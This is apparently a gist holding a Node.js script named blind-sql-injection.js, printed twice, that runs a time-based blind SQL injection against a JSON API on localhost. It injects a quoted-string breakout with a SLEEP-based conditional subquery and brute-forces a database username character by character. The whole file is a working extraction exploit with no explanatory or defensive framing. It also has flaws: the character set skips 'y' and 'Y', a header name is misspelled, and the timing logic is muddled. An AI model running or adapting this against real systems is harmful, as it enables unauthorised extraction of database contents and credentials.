chiro-hiro/blind-sql-injection.js

## blind-sql-injection.js
const http = require('http');

function request(json) {
    return new Promise((resolve, reject) => {
        let startTime = Date.now();
        let body = JSON.stringify(json);
        const options = {
            host: 'localhost',
            method: 'POST',
            port: 3000,
            path: '/api/v?/xxxxxx',
            headers: {
                'Content-Type': 'application/json',
                'Content-Lenght': body.length
            }
        };

        let req = http.request(options, (res) => {
            if (res.statusCode === 500) {
                resolve(Date.now() - startTime);
            } else {
                reject(0);
            }
        });
        req.write(body);
        req.end();
    });
}

(async () => {
    let charset = 'abcdefghijklmnopqrstuvwxzABCDEFGHIJKLMNOPQRSTUVWXZ 0123456789.\'';
    let offset = 1
    let value = '';
    let result = [];
    let code = 0;
    while (true) {
        let time = await request({
            "xxxxxx_id": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
            "xxxxxx_id": `1" and IF(RIGHT(LEFT((SELECT \`user_name\` FROM \`xxxx\` LIMIT 0,1),${offset.toString()}),1) = '${value}', SLEEP(0.001), FALSE) and ""="`
        });

        if (time > 1000 && value === '') {
            break;
        } else if (time > 1000 && value !== '') {
            console.log('Found character', value, 'at', offset);
            result.push(value);
            value = '';
            offset++;
            code = 0;
        } else {
            value = charset[code++];
            if (code >= charset.length) {
                result.push('?');
                value = '';
                offset++;
                code = 0;
            }
        }
    };
    console.log('Result:', result.join(''));
})();
	const http = require('http');

	function request(json) {
	return new Promise((resolve, reject) => {
	let startTime = Date.now();
	let body = JSON.stringify(json);
	const options = {
	host: 'localhost',
	method: 'POST',
	port: 3000,
	path: '/api/v?/xxxxxx',
	headers: {
	'Content-Type': 'application/json',
	'Content-Lenght': body.length
	}
	};

	let req = http.request(options, (res) => {
	if (res.statusCode === 500) {
	resolve(Date.now() - startTime);
	} else {
	reject(0);
	}
	});
	req.write(body);
	req.end();
	});
	}

	(async () => {
	let charset = 'abcdefghijklmnopqrstuvwxzABCDEFGHIJKLMNOPQRSTUVWXZ 0123456789.\'';
	let offset = 1
	let value = '';
	let result = [];
	let code = 0;
	while (true) {
	let time = await request({
	"xxxxxx_id": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
	"xxxxxx_id": `1" and IF(RIGHT(LEFT((SELECT \`user_name\` FROM \`xxxx\` LIMIT 0,1),${offset.toString()}),1) = '${value}', SLEEP(0.001), FALSE) and ""="`
	});

	if (time > 1000 && value === '') {
	break;
	} else if (time > 1000 && value !== '') {
	console.log('Found character', value, 'at', offset);
	result.push(value);
	value = '';
	offset++;
	code = 0;
	} else {
	value = charset[code++];
	if (code >= charset.length) {
	result.push('?');
	value = '';
	offset++;
	code = 0;
	}
	}
	};
	console.log('Result:', result.join(''));
	})();